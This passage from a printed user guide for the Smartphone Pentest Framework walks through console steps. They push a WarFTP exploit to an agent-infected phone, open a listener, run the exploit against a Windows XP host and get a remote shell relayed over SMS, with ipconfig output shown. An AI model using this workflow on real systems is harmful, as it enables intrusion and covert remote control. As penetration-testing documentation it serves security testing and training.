spf> 6

Downloads a file to the phone. Fill in the file and the delivery method(SMS or HTTP)

File to download: /root/Smartphone-Pentest-Framework/exploits/Windows/warftp2

Hosting Path: /hgfd

Filename: /warftp2

Delivery Method(SMS or HTTP): HTTP

Before running the command choose option 10.) TCP Listener. You will be prompted for the Delivery and Return m
method for the shell. Using SMS our shell we leave the local network out of bounds of the network. You will also n

24 of 27 6/14/2016 10:05 AM
SPF User Guide – Bulb Security http://www.bulbsecurity.com/products/smartphone-pentest-framework/spf...

spf> 10
HOME SERVICES PRODUCTS PUBLIC SPEAKING
Open a TCP listener on the phone. Fill in the delivery method(SMS or HTTP) and retur

MEDIA ACTIVITY ABOUT CONTACT


Delivery Method(SMS or HTTP)

spf> HTTP

Return Method(SMS or HTTP)

spf> SMS

Port:

spf> 4444

Then tell the Agent to run the attack against WarFtp.

Select a command to perform or 0 to return to the previous menu

spf> 7

Run a command in the terminal. Fill in the command and the delivery method(SMS or HT

Command: warftp2 192.168.20.29 21

Downloaded?: yes

Delivery Method(SMS or HTTP): HTTP

This time the shell will be sent to the Agent infected device that will send any commands and info from the shell to
11.) Connect to Listener from the Agent Commands menu to open the shell. Specify the port and communication m
completely out of band. You may notice a bit of a delay if service is bad.

spf> 11

Connect to a TCP Listener from the agent. Enter the port number of the listener.

Port: 4444

Communication Method(HTTP or SMS): SMS

Microsoft Windows XP [Version 5.1.2600]

(C) Copyright 1985-2001 Microsoft Corp.

---

ipconfig

25 of 27 6/14/2016 10:05 AM
SPF User Guide – Bulb Security http://www.bulbsecurity.com/products/smartphone-pentest-framework/spf...

C:\Documents and Settings\georgia\Desktop>ipconfig


HOME SERVICES PRODUCTS PUBLIC SPEAKING
---

MEDIA ACTIVITY ABOUT CONTACT


---Windows IP Configuration---

---

---------

Ethernet adapter Local Area Connection:

------

--- Connection-specific DNS Suffix . : XXXX

---

IP Address. . . . . . . . . . . . : 192.168.20.29

...snip...

The exploit code for this and the previous example needs to be in C, but it is not limited to a particular vulnerability

26 of 27 6/14/2016 10:05 AM
SPF User Guide – Bulb Security http://www.bulbsecurity.com/products/smartphone-pentest-framework/spf...

Contact Info Twitter Search


HOME SERVICES PRODUCTS PUBLIC SPEAKING
@GeorgiaWeidman
Email
[email protected]
MEDIA ACTIVITY ABOUT
RT @shevirahsec: Thank you CONTACT
to @CITorg and the
Social Media
Commonwealth for the two
Commonwealth Research
Commercialization Fund
grants https://t.co/KjB…

I am quoted in this
@eWEEKNews about the
additional Wendy's
compromises https://t.co
/leepEN0XCv thanks
@TechJournalist

.@shevirahsec received 2
Commonwealth Research
Commercialization Fund
grants: https://t.co
/xDJ9jakbYj

© 2016 - Bulb Security Home About Services Products Blog Contact

27 of 27 6/14/2016 10:05 AM

You might also like